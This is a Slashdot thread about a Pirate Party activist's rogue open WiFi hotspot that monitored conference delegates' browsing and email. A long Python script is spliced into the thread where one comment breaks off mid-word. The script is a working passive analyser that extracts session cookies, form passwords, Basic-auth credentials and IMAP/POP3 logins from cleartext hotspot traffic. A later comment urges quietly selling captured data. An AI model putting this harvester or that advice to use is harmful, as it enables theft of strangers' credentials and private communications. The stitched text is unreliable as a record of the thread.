Simple Rogue WiFi Hotspot Captures High Profile Data
jones_supa writes Gustav Nipe, president of Sweden's Pirate Party's youth wing, was successful with a somewhat trivial social engineering experiment in the area of the Sälen security conference. He set up a WiFi hotspot named "Öppen Gäst" ("Open Guest") without any kind of encryption. What do you know, a large number of unsuspecting high-profile guests associated with the network. Nipe says he was able to track which sites people visited as well as the emails and text messages of around 100 delegates, including politicians and journalists as well as security experts. He says that he won't be revealing which sites were visited by specific experts, as the point was just to draw attention to the issue of rogue network monitoring. The stunt has already sparked criticism in Swedish newspapers and on social media, with some angry comments saying that Nipe breached Sweden's Personal Data Act.
You want to protect your data? (Score:5, Insightful)
If you want to protect your data, don't connect to an open WiFi hotspot.
Also, shame on the so-called "security experts" who used it.
Re: (Score:1)
What's wrong with that? Whenever I use an open hotspot, I *assume* the worst... if I can ssh to https into whatever, so what?
If I don't care about stuff, (e.g. reading cnn.com, for example), then who cares if it's encrypted or not?
Stunts like this scare people into not using/providing open internet access... I'd rather we have *more* open wifis (monitor whatever you want out of them), just have them be all over whenever I need them.
Re:You want to protect your data? (Score:5, Insightful)
Are you 100% certain the cnn.com you think you asked for a page is actually cnn.com and not some i'm-gonna-fill-your-browser-full-of-malware spoof?
Re:You want to protect your data? (Score:5, Funny)
can't be any worse than the real cnn.com
Re:You want to protect your data? (Score:5, Insightful)
Agree with this AC.
What I'm more concerned about and don't know the answer to are the Smart Phone apps which may check for their own "updates" while I'm on a sinister wifi hotspot. Will a "Bank of App" program open an auto update query in the background, and disclose any details I don't intend it to? I never "save passwords" and rarely enter them in unknown wireless environments.
The Swedish guy probably did a public service, but the alarms seem aimed at people who don't know the risks. "Never use wifi, and never read CNN online" hyperbole just fatigues people and causes people to treat it as an acceptable risk rather than something they can cope with through caution. The "what if it's a fake CNN site" question is a totally separate problem which could occur on a verified hotspot, or wired account... And so what if it's a fake CNN site? They get my lowest concern throwaway password, as I have no money at CNN. I too am always careful which sites I go to on public wifi hotspots.
Re: (Score:2)
The apps themselves, though, seem to be amazingl
Re: (Score:2)
Re:You want to protect your data? (Score:4, Informative)
What's wrong with that? Whenever I use an open hotspot, I *assume* the worst... if I can ssh to https into whatever, so what?
If I don't care about stuff, (e.g. reading cnn.com, for example), then who cares if it's encrypted or not?
Stunts like this scare people into not using/providing open internet access... I'd rather we have *more* open wifis (monitor whatever you want out of them), just have them be all over whenever I need them.
I largely agree with you, open hotspots are excessively demonized(both 'if you touch one you'll get cyber-syphilis!' and 'if you operate one pedophiles will smell it from miles away and you'll go to jail forever!'); but they can be dangerous, and people frequently don't take enough precautions.
Awareness of VPNs is actually pretty high, all things considered; but mostly for the purposes of getting Netflix in foreignistan, or getting to facebook at school/work. This tends to mean that even people who know about, and use, them typically don't ensure that all chatter from their computer(unless you are very careful, that's often a lot, from all sorts of updaters, autodiscovery agents, and annoying background processes) goes over the VPN, since their use of VPNs is all about ensuring that a specific, normally blocked, bit of traffic makes it out alive, rather than ensuring that no traffic leaks locally.
The area I would argue with you about is 'unimportant' HTTP: Do I care that somebody knows I visited CNN? No. However, if I make an HTTP connection, do I have the slightest assurance that I'm actually visiting CNN, rather than 'CNN, plus some rewrites that add a suite of common browser exploits'? Not so much. That can, and does, happen even on a trusted connection, through sites being hacked or ad network fuckery; but adding another party who can trivially rewrite the site with god-knows-what isn't really something you want.
If you have a proper VPN, with all traffic either heading over it or blocked before it leaves your system, though, all good.
Re: (Score:3)
Re:You want to protect your data? (Score:4, Insightful)
Re: You want to protect your data? (Score:1)
VPN? (Score:3)
Hackers Obey the Law!! (Score:5, Insightful)
with some angry comments saying that Nipe breached Sweden's Personal Data Act
like hackers really care about obeying laws?
Re: (Score:3, Insightful)
Re: (Score:1)
I think a valuable, although statistically useless, point here is that the police didn't catch this guy. He turned himself in. What happens in a real-world version of this attack? What will that law end up doing? Most of the time, not getting someone in front of a judge to be told he deserves no leniency. Most of the time, it will be as if the law doesn't even exist, and there will be plenty of leniency.
Re:Hackers Obey the Law!! (Score:4, Funny)
Worse, did not the delegate commit Theft of Service by using a WLAN they were not authorized to?
Re: (Score:2)
You can't visit a website without it having +10 trackers on it either.
Are they breaching the law too? Or is it just illegal if you don't do it to make money out of it?
Re: (Score:2)
dupe (Score:5, Informative)
http://mobile.slashdot.org/sto... [slashdot.org]
Re: (Score:2)
Maybe the editors are getting Alzheimer's. Twelve hours is a pretty short time for a dupe though.
Re: (Score:2)
I just thought of another reason. Maybe since the original post had less than 70 comments they may have thought adding the term 'Rogue WiFi' might garner more attention. If it doesn't get enough traffic then sensationalize it.
Re: (Score:2)
nahh if that was the motive, they would throw in something about Obama and Global warming.
Re: (Score:2)
I've never ever EVER even had a HINT of a desire to create a Twitter account... But perhaps it's time I considered it. #NixonNow
Re: (Score:2)
Re: (Score:2, Informative)
I always steal a car before informing people about their lord and savior Jebus Christ.
The Sub-Genii have been doing that for years.
some things for any judge to consider (Score:5, Informative)
An open network connection at a security conference. That's either a honeypot or a freebie. Were it me, I'd assume the latter, but I wouldn't be doing my online banking through it. If I were an attendee, I'd know better.
If he's guilty of providing free internet service then people the world over who open their wifi connections are also guilty. I say, and cue the flaming for this, that data security starts and ends with the owner of the data. Take some fucking responsibility for yourself instead of relying on a Government that doesn't give a fuck about you, to do it for you. If anybody should be prosecuted for leaking data in clear text through an unencrypted radio stream (he was literally the guy on the next bench listening in on a shouted conversation, here!), then it should be the administrators of the websites that were visited for not using properly secured data channels such as SSL, endpoint encryption, tunnelling or whatever.
Re: (Score:1)
Re: (Score:1)
Re:some things for any judge to consider (Score:4, Interesting)
An open network connection at a security conference. That's either a honeypot or a freebie.
This. At the security conference I attend (defcon), assuming you got drunk enough to be dumb enough to connect to an open hotspot, you'd be thanking your lucky stars if the worst that happened to you was getting on the wall of sheep (which is essentially the same stunt this guy pulled, with the information projected on a wall for everyone to see). I personally VPN *everything* during that week, and if I absolutely have to connect to a work system, I drive to a random McDs outside of the conference and do my VPNing from there (it's usually faster and more reliable than any network at the conference too, since it's not the prize in a big game of Spy vs Spy).
Min
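The "wall of sheep" the comment above describes, and the stunt in the summary, both come down to the same passive step: reading application-layer payloads that an open hotspot broadcasts in the clear and pulling out the parts that matter. The script below is an added illustration of that step, written for this page; it is not Nipe's tooling, not the Defcon Wall of Sheep code, and not from anyone in the thread. Every "captured" payload in it is constructed sample data (the hosts, IPs, usernames and passwords are made up), and the port-to-protocol mapping is a deliberately small assumption: cleartext HTTP, IMAP and POP3 are inspected, while flows to TLS ports only yield the endpoint, which is exactly the distinction the thread is arguing about.

```python
"""Minimal passive 'wall of sheep' analyser.

Added example for this page (not Nipe's code, not the Defcon tool).
Input: reassembled client-to-server payloads as an open-hotspot operator
would see them. All sample traffic below is constructed, not captured.
"""
import base64
import re
from dataclasses import dataclass
from typing import List
from urllib.parse import parse_qs


@dataclass
class Flow:
    src: str        # client on the hotspot (constructed)
    dst: str        # server address (constructed)
    dport: int      # server port; used here as the protocol hint
    payload: bytes  # client-to-server bytes (constructed)


@dataclass
class Finding:
    src: str
    protocol: str
    detail: str


HTTP_PORTS = {80, 8080}                  # assumption: plain HTTP
ENCRYPTED_PORTS = {443, 993, 995, 465, 22}  # assumption: TLS/SSH, opaque

_HOST = re.compile(rb"^Host:[ \t]*([^\r\n]+)", re.M | re.I)
_BASIC = re.compile(rb"^Authorization:[ \t]*Basic[ \t]+(\S+)", re.M | re.I)
_COOKIE = re.compile(rb"^Cookie:[ \t]*([^\r\n]+)", re.M | re.I)
_IMAP_LOGIN = re.compile(rb"^\S+[ \t]+LOGIN[ \t]+(\S+)[ \t]+(\S+)", re.M | re.I)
_POP_USER = re.compile(rb"^USER[ \t]+(\S+)", re.M | re.I)
_POP_PASS = re.compile(rb"^PASS[ \t]+(\S+)", re.M | re.I)
_SECRET_FIELD = re.compile(r"pass|pwd|secret|token", re.I)


def _http_findings(flow: Flow) -> List[Finding]:
    """Host visited, Basic credentials, cookies and password-like POST fields."""
    found = []
    host_m = _HOST.search(flow.payload)
    host = host_m.group(1).decode("latin-1").strip() if host_m else flow.dst
    found.append(Finding(flow.src, "http", f"visited http://{host}/"))
    basic = _BASIC.search(flow.payload)
    if basic:
        try:
            creds = base64.b64decode(basic.group(1), validate=True).decode("latin-1")
        except (ValueError, UnicodeDecodeError):
            creds = "<undecodable>"
        found.append(Finding(flow.src, "http", f"basic auth to {host}: {creds}"))
    cookie = _COOKIE.search(flow.payload)
    if cookie:
        value = cookie.group(1).decode("latin-1")
        found.append(Finding(flow.src, "http", f"session cookie for {host}: {value}"))
    head, sep, body = flow.payload.partition(b"\r\n\r\n")
    if sep and head.upper().startswith(b"POST "):
        for field, values in parse_qs(body.decode("latin-1")).items():
            if _SECRET_FIELD.search(field):
                found.append(Finding(flow.src, "http",
                                     f"form field {field!r} to {host}: {values[0]}"))
    return found


def _mail_findings(flow: Flow) -> List[Finding]:
    """IMAP LOGIN and POP3 USER/PASS are sent verbatim without STARTTLS."""
    found = []
    if flow.dport == 143:
        for m in _IMAP_LOGIN.finditer(flow.payload):
            user, pw = (g.decode("latin-1") for g in m.groups())
            found.append(Finding(flow.src, "imap", f"login {user} / {pw} at {flow.dst}"))
    elif flow.dport == 110:
        user, pw = _POP_USER.search(flow.payload), _POP_PASS.search(flow.payload)
        if user and pw:
            found.append(Finding(flow.src, "pop3",
                                 f"login {user.group(1).decode('latin-1')} / "
                                 f"{pw.group(1).decode('latin-1')} at {flow.dst}"))
    return found


def analyse(flows: List[Flow]) -> List[Finding]:
    """Classify each flow by port and extract what the operator can read."""
    findings: List[Finding] = []
    for f in flows:
        if f.dport in ENCRYPTED_PORTS:
            findings.append(Finding(f.src, "encrypted",
                                    f"only the endpoint {f.dst}:{f.dport} is visible"))
        elif f.dport in HTTP_PORTS:
            findings.extend(_http_findings(f))
        elif f.dport in (110, 143):
            findings.extend(_mail_findings(f))
    return findings


# Constructed sample traffic: every host, address and credential is made up.
SAMPLE_FLOWS = [
    Flow("10.0.0.11", "203.0.113.10", 80,
         b"GET /news HTTP/1.1\r\nHost: cnn.example\r\nCookie: sid=abc123\r\n\r\n"),
    Flow("10.0.0.12", "203.0.113.20", 80,
         b"POST /login HTTP/1.1\r\nHost: webmail.example\r\n"
         b"Content-Type: application/x-www-form-urlencoded\r\n\r\n"
         b"user=anna&password=hunter2"),
    Flow("10.0.0.13", "203.0.113.25", 8080,
         b"GET /api HTTP/1.1\r\nHost: intranet.example\r\n"
         b"Authorization: Basic dXNlcjpwYXNz\r\n\r\n"),
    Flow("10.0.0.14", "203.0.113.30", 143,
         b"a001 LOGIN bob@mail.example s3cret\r\na002 SELECT INBOX\r\n"),
    Flow("10.0.0.15", "203.0.113.40", 110, b"USER carol\r\nPASS letmein\r\nSTAT\r\n"),
    Flow("10.0.0.16", "203.0.113.50", 443, b"\x16\x03\x01\x00\x2a\x01\x00\x00\x26"),
]


def demo() -> List[Finding]:
    return analyse(SAMPLE_FLOWS)


if __name__ == "__main__":
    for finding in demo():
        print(f"{finding.src:<12} {finding.protocol:<10} {finding.detail}")
```

The useful observation is in the last sample flow: the TLS client hello yields nothing but an address and port, which is the whole of the "if I can https into whatever, so what?" argument, while the cleartext flows leak the session cookie, the login form, the Basic credentials and both mail logins without any active attack at all.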
The set up was so nice (Score:1)
they duped it twice.
not an ICT security conference (Score:1)
The "Sälen security conference" is a defense security conference.
It is not some IT guys meeting for some cool white/black hat stuff.
They should still be aware of the dangers, but it is perfectly understandable since these people are usually the ones fired up to their incompetence level.
And they don't have a clue about network security. And if you inform them they do not care since they think all should be provided for them.
The danger of open networks (Score:4, Interesting)
At some point ... (Score:3)
... you have to take responsibility for what you are doing.
Yes, I could call up the post office and ask if that new blue mailbox on the street corner that says "post office" is legit. That would be so efficient, societal-ly speaking, huh?
Or we could just throw people in jail who set up fake post boxes.
Re: (Score:2)
Slashdot entry is only half-true (Score:1)
First, it was not a security conference, it was a conference regarding government surveillance. Nipe was surveilling the government representatives who want to surveil citizens more.
The conference wasn't really about security, it was about anonymity and personal integrity.
Cap'n Jack Sparrow for President (Score:2)
"...The stunt has already sparked criticism in Swedish newspapers and on social media, with some angry comments saying that Nipe breached Sweden's Personal Data Act."
Uh...maybe the whole country ah...missed something here..
"Gustav Nipe, president of Sweden's Pirate Party's youth wing..."
Uh...yeah..I mean THAT part.
Helllloooo.... Pirate. Remember? Cap'n Jack Sparrow made that concept pretty damn clear I thought. Don't act so surprised.
Oh, and be thankful it was a pirate. Those damn ninjas are sneaky.
I weep for humanity (Score:3)
I keep seeing stuff like this. Someone who is not stupid makes enough rope available, someone who IS stupid hangs themselves with it, and the first guy takes all the blame. We protect the stupid at all costs. The appropriate response to this is "Don't connect to hotspots you're not sure about, and if you do, take appropriate measures (VPN, https, etc)". No, this is too hard for the shitheads out there who keep getting protected from their own stupidity.
What I think the non-stupid people need to do is to stop helping these people. Next time, this guy should just keep quiet about what he did at the conference, and quietly sell the incriminating information he collects. Eventually the stupid people will either get tired of having their identities/all their money stolen, and wise the fuck up, or they won't and will be removed from the useful ranks of society. Either way the situation improves.
I'm not saying I'm smarter than anyone else. I'm saying that if I do something stupid, it's my own damn fault. We don't blame the truck driver when someone plays in traffic. The internet has been part of society in one way or another for over twenty years. It's long enough.
Wifi name (Score:1)
And thus the surveillance crowd is put on notice (Score:1)
Two can play at this game, or more. The NSA wants to watch us? We can also watch *them*. You may not. I may not. But I guarantee you that someone will, and that their names, addresses, phone numbers and movements will some day show up on the equivalent of wikileaks.
Revenge is a dish best served cold.